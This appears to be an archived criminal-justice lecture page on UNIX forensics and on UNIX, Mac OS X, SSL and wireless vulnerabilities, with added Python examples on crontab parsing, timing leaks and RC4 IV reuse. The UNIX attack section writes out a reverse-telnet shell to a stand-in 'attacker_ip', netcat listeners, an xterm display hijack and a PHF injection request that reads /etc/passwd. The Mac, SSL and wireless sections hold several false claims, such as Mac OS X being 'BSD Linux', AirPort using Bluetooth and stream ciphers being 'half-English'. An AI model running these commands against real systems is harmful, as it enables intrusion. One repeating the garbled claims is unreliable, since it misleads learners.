UNIX provides a number of LOGS. The one investigators consult most is the system log written by syslogd, whose configuration file /etc/syslog.conf says which facilities and priorities are written to which files (usually under /var/log, or /var/adm on older systems). The /etc directory is the most important directory in the UNIX universe, the target of most attacks as well as the starting point of most detections. Remote logins are recorded in the system log and in wtmp with the user name and the source host; passwords are not logged, although a password mistyped into the login-name prompt ends up in a failed-login entry, which is one reason these logs need protecting. Another log is process accounting, the pacct or acct file (under /var/adm, /var/account or /usr/adm, depending on the system), which records every command each user executes. It is a binary file and must be read with lastcomm (BSD and Linux) or acctcom (System V).
The most basic security feature in UNIX involves FILE PERMISSIONS. Each time a file is created, the logged-in user "owns" that file and can set its access permissions with the chmod command. If you list files in long format with ls -l, you might see something like this:
$ ls -l
drwxrwxr-x 2 tom wp 2018 Aug 30 23:45 adir
-rw-rw-r-- 1 tom wp 8755 Aug 30 23:37 picture.gif
-rwxrwxr-x 1 tom wp 8525 Sep  4 02:48 command.sh
The first character on the far left is d for a directory, a dash (-) for a regular file (l for a symbolic link, c or b for device files). The next nine characters are three triplets of r, w and x (or a dash where a permission is absent): the first triplet applies to the file's owner (u), the second to the owner's group (g), and the third to everyone else (o); chmod also accepts a for all three at once. r is read permission, w write permission, and x permission to execute the file (or, for a directory, to enter it). An s in place of the x in the owner or group triplet marks a setuid or setgid program, which runs with the owner's or group's privileges rather than the caller's; setuid root binaries are the classic UNIX privilege escalation target and worth listing (find / -perm -4000). A t in the last position is the sticky bit, which on /tmp-style directories stops users deleting each other's files. The second column is the hard link count, followed by the owner (tom in the example), the group (wp), the size, the modification time, and the name.
Once you have established the file's "owner", you need to find out what GROUPS they belong to: the id or groups command, or the /etc/group file, tells you. The built-in groups vary from system to system; typical ones are root (or wheel on BSD-style systems, whose members are the only ones allowed to su to root), sys, bin, daemon, adm (readers of the logs), mail, and users for ordinary mortals. "Superuser" and root are the same account, UID 0, and there is no built-in partial administrator comparable to Power Users under Windows: operations such as mounting file systems, reading raw disks, and restoring backups with their original ownership require root. Someone with something to hide therefore goes for root, or for a setuid-root program, precisely because root can mount, unmount and alter anything.
MOUNTING attaches a file system (a disk partition, a CD, a network share) to a directory, the mount point, so that its contents appear in the directory tree; a file system can be mounted read-only or read-write, locally or from a remote NFS or SMB server. Mounting hides whatever was in the mount-point directory before, and unmounting brings it back, so files can be concealed this way. The file systems to be mounted at boot are listed in /etc/fstab; the currently mounted ones appear in /etc/mtab (or /proc/mounts on Linux) and in the output of mount with no arguments. mount also allows loopback mounts (mount -o loop), which present an ordinary file, such as a disk image, as a file system: forensic examiners use this to examine an image read-only (mount -o loop,ro) without touching the original, and other file systems can then be mounted within it without affecting the original.
For investigative purposes, it's important to know how UNIX deletes files. A file's link count (the second column of ls -l) is the number of directory entries, or hard links, that point at its inode, not the number of processes using it. rm unlinks one name; when the count reaches zero and no process holds the file open, the kernel frees the inode and its data blocks, but nothing on the disk is actually overwritten, which is what makes recovery possible. If a process still has the file open, the inode and data survive until that process closes it: the file has "disappeared" from every listing, yet it is fully readable through the open descriptor (on Linux via /proc/PID/fd), a favourite trick of attackers for hiding tools and of investigators for recovering deleted logs. During a normal shutdown every process is terminated and every file system is unmounted cleanly. If the plug is pulled (a non-normal shutdown), the file systems are not unmounted, their dirty flags remain set, and fsck repairs them at the next boot, which may itself alter evidence, one more reason to image the disk before doing anything else.
There are many ways to attack UNIX systems. An unskilled attacker might try to crack passwords with a tool such as John the Ripper; with a copy of the password hashes, a fast machine runs through an entire dictionary in a couple of hours. Another might try to achieve interactive shell access via telnet, rlogin, or ssh. A graphical (X Window) environment offers another route: if the attacker's own X server accepts connections from anyone (xhost +), a single command run on the target, xterm -display attacker:0, opens a terminal on the attacker's screen; conversely, a target that has run xhost + lets the attacker open windows and read keystrokes on the victim's display. An alternative to xterm is reverse telnet, or back channeling, in which the target is made to establish a connection to the attacker's computer, which passes firewalls that block inbound but not outbound connections. The attacker opens two windows, each listening with netcat (nc) on a port that outbound filters usually allow, 80 and 25: nc -l -v -n -p 80 and nc -l -v -n -p 25 (-l listen, -p port, -v verbose, -n no resolution of IP addresses into hostnames). A command sent to the target through whatever initial foothold exists, telnet attacker_ip 80 | /bin/sh | telnet attacker_ip 25, then reads commands typed into the first window and returns their output to the second.
An older class of exploit involves CGI (Common Gateway Interface) vulnerabilities, which were common on UNIX web servers. The PHF (phone book script) attack was common in 1996 and 1997, when web pages had form-based interfaces linking to a white-pages-like service for looking up names and contact information. The phf program passed its query to a shell without filtering it, so the request /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd, in which %0a is an encoded newline and %20 an encoded space, terminates the intended command and runs cat /etc/passwd, returning the password file in the HTTP response. This is command injection through unchecked input, not a stack overflow.
More modern attacks involve kernel rootkits such as knark (Swedish slang for "drugs"), a Linux LKM (Loadable Kernel Module) rootkit. Rootkits trojanize system programs or the kernel itself to hide the attacker's files, processes and connections, and usually install sniffers along with a variety of other utilities. Traditional rootkits replace command binaries (ls, ps, netstat, login) on disk; LKM rootkits instead load a module into the running kernel, where they hook the system call table, so the command binaries can be genuine and still lie, because the kernel beneath them is lying. They do not need to modify the kernel image file on disk, although some do. Attackers can then enjoy watching administrators and users try to fix a system whose every tool is compromised. Kernel rootkits are devastating and very hard to find from inside the running system. For more information about them, read the SANS backgrounder or PacketStorm Security's list of rootkits. Rootkits represent the state of the art in hacking. To find out whether you have been infected, do not trust the infected system's own tools: boot from known-good media, compare binaries and the kernel against known-good checksums, or at least run a checker such as chkrootkit or rkhunter from a clean copy. Installing a rootkit on a lab machine and running its utilities tells you what it hides, which is a useful supplement, but not a test of a suspect system.
Distributed Denial of Service (DDoS) attacks are also common on UNIX and Linux systems. Variants of the Trinity and Stacheldraht agents exist in the wild, and they should be regarded as very serious since college campuses nationwide are infected with them, waiting for the day to launch a zombie attack. Trinity v3 is a DDoS tool that is controlled via IRC or ICQ. When a system has been compromised and the Trinity v3 tool installed, each compromised machine joins a specified IRC channel and waits for commands. The Trinity v3 tool enables intruders to use multiple Internet-connected systems to launch packet flooding denial of service attacks against one or more target systems. At least eight variations of Trinity have been found. Stacheldraht consists of three parts -- a master server, a client, and an agent program -- and runs on Linux and Solaris machines. Stacheldraht performs several types of flooding attacks, and has IRC flooding options. If such agents are installed, they are most likely set by a timer to go off at a later date, hence the need for investigators to know how to analyze UNIX crontab files, which list scheduled events.
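To illustrate the crontab analysis mentioned above, here is an added example (not part of the original page) that parses crontab lines, evaluates whether a job fires at a given minute, and singles out entries pinned to one date and time; the crontab content is constructed and 192.0.2.10 is a documentation address.

```python
from datetime import datetime

# Constructed crontab content for illustration; 192.0.2.10 is a documentation address.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
*/10 * * * * /home/www/cleanup.sh
30 23 14 2 * /tmp/.x/agent -flood 192.0.2.10
"""
FIELD_RANGES = [(0, 59), (0, 23), (1, 31), (1, 12), (0, 7)]  # minute, hour, dom, month, dow

def expand_field(spec, low, high):
    """Expand one field ('*', '5', '1-5', '*/10', '1,15') into the set of values it matches."""
    values = set()
    for part in spec.split(","):
        body, _, step = part.partition("/")
        step = int(step) if step else 1
        if body == "*":
            start, end = low, high
        elif "-" in body:
            start, end = (int(x) for x in body.split("-"))
        else:
            start = end = int(body)
        values.update(range(start, end + 1, step))
    return values

def parse_crontab(text):
    """Turn crontab lines into jobs; comments and blank lines are skipped."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 5)
        if len(fields) < 6:
            continue
        sets = [expand_field(f, lo, hi) for f, (lo, hi) in zip(fields, FIELD_RANGES)]
        if 7 in sets[4]:                  # cron accepts 7 as another name for Sunday (0)
            sets[4].add(0)
        jobs.append({"sets": sets, "dom_any": fields[2] == "*",
                     "dow_any": fields[4] == "*", "command": fields[5]})
    return jobs

def fires_at(job, when):
    """True if the schedule matches the given minute; as in cron, when both day fields
    are restricted a match on either day-of-month or day-of-week suffices."""
    minute, hour, dom, mon, dow = job["sets"]
    dom_ok, dow_ok = when.day in dom, (when.weekday() + 1) % 7 in dow  # cron: Sunday is 0
    both_restricted = not (job["dom_any"] or job["dow_any"])
    day_ok = (dom_ok or dow_ok) if both_restricted else (dom_ok and dow_ok)
    return when.minute in minute and when.hour in hour and when.month in mon and day_ok

def one_shot_jobs(jobs):
    """Entries pinned to a single minute, hour, day and month: a timer set for one date."""
    return [j for j in jobs if all(len(s) == 1 for s in j["sets"][:4])]
```

Calling one_shot_jobs(parse_crontab(SAMPLE_CRONTAB)) returns only the /tmp/.x/agent entry, the kind of single-date timer the paragraph above describes.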
Sooner or later, an investigator is going to have to attempt recovering deleted files from a UNIX or Linux system. This is very hard to do. UNIX stores file information in physical disk locations called inodes. An inode contains last accessed/created/modified information as well as the file size, reference count, and data block list. To recover a UNIX file, one must rebuild the file size and data block list. This is not easily done, and requires a tool called icat from the Coroner's Toolkit. Using icat and specifying the device and inode of a file (found with an ls command), you can often reconstruct the entire contents of the file. However, it's mostly a matter of luck.
MAC VULNERABILITIES
Apple Computer, Inc. has a long history. The company was started in 1976 by Steven Jobs and Steven Wozniak, and made the first personal computer housed in plastic and the first to have color graphics. Other firsts include the 1991 rollout of the Powerbook, the world's first notebook, and the 1993 production of the Newton, the world's first PDA. Today's Macs range from the $1400 iMac (both new and old) to a fully-equipped $3900 Power Mac G4 (the Cube), and all Apple computers come shipped with both Mac OS X and Mac OS 9 installed on them. A few 1997 or older Macs can still be found running versions of OS 8 and OS 7, which were fairly insecure systems (no password authentication, for example), but the vast majority of apps were written for OS 9. Apple markets a variety of accessories as well as computer hardware and software. For years, the Mac OS and Windows OS were incompatible, and they still are somewhat, but see the Complete Guide to Mac/Windows Interoperability.
Mac OS X (the focus of this lecture) is a customized variant of mach3 Unix (SunOS Unix) and BSD Linux (FreeBSD Unix), and represents a radical departure from Apple's previous Mac operating systems. DARWIN is the name for the Apple-friendly UNIX-based core of Mac OS X. CARBON and COCOA are built-in application programming interface (API) environments which allow developers to create their own customized applications. Carbon is a C-level scripting language for application programming or threading, and Cocoa contains user-interface widgets in what Apple calls Aqua programming, designed for rapid development of object-oriented plug-ins. Aqua is also the name for the shell in which users interact with the operating system. Each copy of Mac OS X includes JAVA (J2SE), which affords the ability to create and run Java (and XML) applications. Every version of Mac OS X ships in multiple languages on a single CD, and the machines are speech-enabled (Text to Speech, and Speech to Text if you add a microphone). The G4s have fairly fast clock speeds (Macs are optimized for speed), and all Macs come equipped with firewire outlets for high-speed peripherals. As with Windows, driver files are required for most devices. QUICKTIME is the multimedia player and QUARTZ is the multimedia creator for Mac OS X, but most users will probably purchase the full version of QuickTime or Final Cut Pro to produce multimedia. In addition, Apple has supported wireless networking since the 1999 iBook and AirPort (using Bluetooth technology). Netscape and Eudora are the web browser and e-mail client of choice, and Dreamweaver and GoLive are the only web editors for a Mac (FrontPage has discontinued support).
The Darwin kernel provides basic services such as threading, scheduling, synchronization, address space management, timers, and virtual memory. In addition, a variety of kernel extensions (KEXTs) are available to extend capabilities. With OS X, users can restrict access to areas of the operating system as well as particular functionalities of an application. Kerberos is used as the default network authentication protocol. Networking with Windows computers has always been a problem, but Apple has tried to make some improvements with OS X. First of all, long file names are supported along with file extensions, but Macs turn off the display of those extensions by default. AppleTalk, which has long been Apple's version of connectivity utilities, works well with other Macs connected by Apple servers (and with Windows machines on some older NT networks, as well as UNIX machines on a SAMBA network), but the user most likely needs to install a full suite of TCP/IP utilities to connect on modern Windows networks. By default, Mac OS X sets up an Automatic location that uses DHCP for Ethernet and AirPort connections, and PPP for modems. Familiar Mac desktop features include the Finder, which allows resource sharing across a network, and the Dock, which stores icons and shortcuts.
The programs used by Macintosh users (Netscape, Eudora, etc.) are subject to as many exploits as, if not more than, the typical programs for Windows. Nor are Macintoshes free from viruses, as is often claimed (visit Viruses and the Macintosh). For live analysis of Macs, the forensic investigator can view a text version of the startup process by holding down CMD-V, which has the same value as analyzing the CMOS and BIOS. Subscription to any of the Mac magazine and security sites listed below will provide further information. What follows is a discussion of some interesting vulnerabilities raised by the Apple Macintosh platform.
SECURE SOCKETS LAYER (SSL) VULNERABILITIES
Certificate-based authentication became the rage in 1998 as an alternative to password-based authentication. Digital certificates are like a driver's license to browse the web. They permit you to access web sites containing or asking for sensitive information, like financial records (online banking) and medical records, and to conduct any transaction dealing with money, social security numbers, or proprietary information. They play a big role in cybercrime and corporate espionage. An understanding of digital certificates (also known as X.509-based PKI - Public Key Infrastructure) requires an understanding of SSL (Secure Sockets Layer).
Mac OS X relies upon SSL, which most people commonly encounter when they access a web page where the URL begins with https:// rather than http://, or a yellow padlock appears in the system tray. SSL was developed by Netscape back in 1994. SSL sets up a secure connection, often called a TUNNEL, between browsers and web servers. It uses public key (RSA) encryption and digital certificates. During connectivity, SSL inserts itself between TCP/IP and the higher-level protocols on behalf of applications, and this layer eliminates the need for encryption/decryption features in every Web-enabled application. Before SSL can be used, web servers must be issued a digital certificate from VeriSign Corp or another certification authority (CA), but anyone with the right software (such as keytool) can create a digital certificate. When a browser encounters one of these homemade CAs, a popup window appears, asking the user if he/she wants to "trust" this site. Name-brand "trusted" sites are built into the latest browser versions to facilitate ease of online shopping from corporate giants, but few users know when they are adding new "trust" relationships with different sites, or how to edit their list of certificates.
Bogus and forged digital certificates are known threats. In 2001, VeriSign itself apologized for issuing two of them to someone pretending to be a Microsoft employee. Self-made bogus keys work by forging the "root" of a trusted site, then getting illegitimate certificates to be treated as legitimate ones. The storage of private keys on personal computers is another threat. Many viruses and trojans exist to extract these keys from your computer, and RSA encryption of the keys is often too weak. The strength chosen depends upon how fast the owner of a secure web site wants to make things. Low-level 40-bit and 56-bit encryption means faster online shopping, and more secure 128-bit keys will slow down the time it takes for a page to load. It also depends upon how much information is being transacted. If exchanges of large databases are involved (as they always are in the corporate, government, financial, education, and healthcare sectors), then the incentive is to use weak, low-level encryption for the PKI.
Some systems rely on tamper-resistant hardware for security: smart cards, electronic wallets, or dongles, and these devices are subject to attack. Smart cards are used in SSO (Single Sign On) authentication, where the employee comes to work, inserts their smart card, and that's it - no more logins or passwords for the rest of the day. The so-called "timing attack" involves measuring the relative time these cryptographic operations take. The attack has been successfully implemented against smart cards, security tokens, and electronic commerce servers across the Internet. Varieties include measuring power consumption, TEMPEST radiation emissions, and other "side channels." Another technique is fault analysis: deliberately introducing faults into cryptographic processors in order to determine the secret keys. The really scary part is that these techniques also work on ATM (cash machine) cards, credit cards, and most cash register transactions.
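As an added illustration (not from the original page) of the data-dependent timing that a timing attack measures, a secret comparison that stops at the first mismatching byte is shown beside a constant-time one; a counter of bytes examined stands in for elapsed time so the effect is deterministic, and the secret and guesses are constructed.

```python
import hmac

def naive_compare(expected: bytes, guess: bytes):
    """Stop at the first mismatching byte. Returns (match, bytes examined): the work done,
    and so the time taken, grows with the length of the correctly guessed prefix,
    which is exactly the signal a timing attack measures."""
    if len(expected) != len(guess):
        return False, 0
    examined = 0
    for a, b in zip(expected, guess):
        examined += 1
        if a != b:
            return False, examined
    return True, examined

def constant_time_compare(expected: bytes, guess: bytes):
    """Examine every byte regardless of where mismatches are, folding differences together
    with XOR/OR, so the work does not depend on the guess. (hmac.compare_digest does this
    in C; comparing fixed-length hashes instead of raw secrets also hides the length check.)"""
    if len(expected) != len(guess):
        return False, 0
    diff = 0
    for a, b in zip(expected, guess):
        diff |= a ^ b
    return diff == 0, len(expected)

def work_profile(expected: bytes, guesses, compare):
    """Bytes examined for each guess; a flat profile leaks nothing about the secret."""
    return [compare(expected, g)[1] for g in guesses]

# Constructed secret and guesses that get progressively longer prefixes right.
SECRET = b"s3cr3tk3y"
GUESSES = [b"xxxxxxxxx", b"s3xxxxxxx", b"s3cr3txxx", b"s3cr3tk3y"]

if __name__ == "__main__":
    print("naive   :", work_profile(SECRET, GUESSES, naive_compare))          # [1, 3, 7, 9]
    print("constant:", work_profile(SECRET, GUESSES, constant_time_compare))  # [9, 9, 9, 9]
    assert hmac.compare_digest(SECRET, GUESSES[-1])   # the library routine agrees
```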
WIRELESS NETWORKING VULNERABILITIES
With AirPort, Mac has pushed the wireless (2.4GHz band) envelope further than other manufacturers. It's not difficult to configure a wireless network, and they are the stuff of Internet coffee shops and cybercafes everywhere. In major cities like Seattle and New York, you can drive around certain neighborhoods until your mobile computer detects a Wireless Access Point (WAP), and then connect to the Internet at surprisingly fast speeds (11Mbps). Similar technology is used for PDAs (Personal Digital Assistants) and Web-enabled cell phones. Wireless networks use weak 64-bit (802.11b or RC4) encryption for authentication, which consists mainly of pseudo-random stream ciphers and data packet integrity checks. Designed for short keys, stream ciphers consist of flip-flopping data streams that are half-code and half-English. All an eavesdropper needs to do is monitor wireless traffic (over a promiscuous wireless network card using AirSnort) for about 15 minutes to figure out a wireless network's password authentication (if any).
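An added example (not part of the original page) of why the short-key RC4 stream cipher described above is weak: a minimal RC4 with a WEP-style per-packet key built as IV plus shared key, where any two packets sent under the same IV share a keystream and so protect each other's content only as well as the other packet's content is unknown. The 40-bit key, 24-bit IV and packet contents are all constructed; the per-packet key construction is the assumed WEP model and the frame's integrity check value is omitted.

```python
def rc4_keystream(key: bytes, length: int) -> bytes:
    """Plain RC4 (key scheduling followed by output generation), written out for illustration."""
    S = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling: permute S under the key
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):                   # generate keystream bytes
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def wep_style_encrypt(shared_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Assumed WEP model: the packet key is IV || shared key and the IV travels in the clear,
    so the same IV always produces the same keystream. (The real frame also carries a
    CRC-32 integrity value, omitted here.) Decryption is the same operation."""
    return xor_bytes(plaintext, rc4_keystream(iv + shared_key, len(plaintext)))

def recover_from_iv_reuse(c1: bytes, c2: bytes, known_p1: bytes) -> bytes:
    """Two packets under one IV share a keystream, so c1 ^ c2 == p1 ^ p2: a packet whose
    content is predictable exposes the other without the key ever being known. With only
    24 bits of IV, such reuse on a busy network happens within minutes."""
    return xor_bytes(xor_bytes(c1, c2), known_p1)

# Constructed 40-bit shared key and 24-bit IV; the packet contents are made up.
SHARED_KEY = b"\x01\x02\x03\x04\x05"
IV = b"\x00\x00\x01"
P1 = b"GET /index.html "          # a packet whose content is easy to predict
P2 = b"user=alice;pw=12"          # a packet of the same length sent under the same IV

if __name__ == "__main__":
    c1 = wep_style_encrypt(SHARED_KEY, IV, P1)
    c2 = wep_style_encrypt(SHARED_KEY, IV, P2)
    print(recover_from_iv_reuse(c1, c2, P1))  # b'user=alice;pw=12'
```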
Besides the ease of breaking into wireless networks, it's easy to set up a decoy wireless operation to sniff user information and passwords from the air. This occurs when an illegitimate access point is set up near (within 300 feet, without signal enhancers) a legitimate wireless access point for the purpose of tricking unsuspecting users into thinking they've logged onto the legitimate one. Often, the customers of a wireless network provider are the target. That's why users are encouraged to use their own encryption. Such measures include Virtual Private Networks (VPN), Secure Sockets Layer (SSL), Secure Shell (SSH), and Secure Copy (SCP). Macintosh shareware and freeware exist for SSH and SCP.
Many devices other than wireless computers use the 2.4GHz band. These include models of cordless phones, baby monitors, garage door openers, fish finders, emergency radios, and Global Positioning Systems. These devices can be used for jamming purposes, the wireless equivalent of a Denial of Service attack. Apple supports all Bluetooth devices, such as headsets, earbuds, and pagers, which operate on the same 2.4GHz frequency and are subject to the same jamming and snooping that all wireless networking is subject to. Although Bluetooth products often have customizable security level settings, use of the highest levels would interfere with their ease of use.
INTERNET RESOURCES
All OSX: Macintosh News and Products
Apple Computer Official Security Page
AppleLinks: Ultimate Macintosh Resource
Hacking Linux Exposed
In-Depth Guide to Hacking UNIX
John Savill's Windows NT/2000/XP FAQ.com
LabMice's Windows 2000/XP/.NET Resource Index
Linux Intrusion Detection System (LIDS)
Linux Online (www.linux.org)
List of Common Back Doors and their Default Ports by Filename
Mac Addict Magazine
MacCentral
MacDesign Online
MacHack: The Annual Conference
MacInTouch Home Page
MacOS Rumors
MacSense Aero Products
MacTech Magazine
MacWorld: The Product Experts
mSec: Mac OS Security Tools
NTBugTraq's Security Exploits and Bugs in Windows NT
O'Reilly Wireless Developer Network
OSX Zone
Paul Thurrott's Supersite for Windows 2000/XP
SecureMac.com
The MacAnalysis Security Audit Tool
The PKI Page
The Unofficial 802.11 Security Page
TSG's MacSecurity.org
Understanding Windows NT Domains and Profiles
Unix, Linux, and Network Security (compared to Windows)
Unix: A Hacking Tutorial
Unix Backdoor Exploits
Unix Guru Universe
Unix Insider
Useful UNIX Hacking Commands
VersionTracker and MacFix
Windows Registry Tweaks, Tricks, and Hacks
PRINTED RESOURCES
Boswell, W. (2000). Inside windows 2000 server. NY: New Riders Publications.
Bott, E. & Siechert, C. (2002). Microsoft windows security inside out. NY: Microsoft Press.
Burk, R. & Douba, S. (1998). Unix unleashed. NY: Sams. [Internet Edition]
Cortinas, M. & Colby, C. (2000). The macintosh bible. CA: Peachpit Press. [companion website]
Cox, P. et al. (2000). Windows 2000 security handbook. NY: McGraw Hill. [sample pages]
Dabak, N. et al. (1999). Undocumented windows NT. NY: Hungry Minds.
Garfinkel, S. & Spafford, G. (1996). Practical unix and internet security. CA: O'Reilly.
Gast, M. (2000). 802.11: The definitive guide. NY: O'Reilly.
Hatch, B., Lee, J. & Kurtz, G. (2001). Hacking linux exposed. NY: Osborne. [companion site]
Howard, M. (2000). Designing secure web apps for windows. NY: Microsoft Press. [sample pages]
Landau, T. (2000). Sad macs, bombs, and other disasters. CA: Peachpit Press.
Mandia, K. & Prosise, C. (2001). Incident response. CA: Osborne.
Miller, M. (2001). Linux for windows addicts. CA: Osborne.
Oppenheimer, A. & Whitaker, C. (2000). Internet security for the macintosh. CA: Peachpit. [companion site]
Pogue, D. (2001). Mac OS X: The missing manual. NY: O'Reilly.
Robbins, A. (1999). UNIX in a nutshell. CA: O'Reilly & Associates.
Scambray, J., McClure, S. & Kurtz, G. (2001). Hacking exposed. CA: Osborne.
Schmidt, J. et al. (2000). Windows 2000 security handbook. NY: Que Press. [sample pages]
Smart Computing. (2002). Computer privacy & security, Volume 8, Issue 4. Lincoln, NE: Sandhills Publishing. [magazine web site]
Solomon, D. & Russinovich, M. (2000). Inside microsoft windows. NY: Microsoft Press. [sample pages]
Steinberg, G. (2001). Upgrading and troubleshooting a mac. NY: McGraw-Hill.
Last updated: Dec. 21, 2008
Not an official webpage of APSU, copyright restrictions apply, see
Megalinks in Criminal Justice
O'Connor, T. (Date of Last Update at bottom of page). In Part of web cited (Windows name for file at top of browser), MegaLinks in Criminal Justice. Retrieved from http://www.apsu.edu/oconnort/rest of URL accessed on today's date.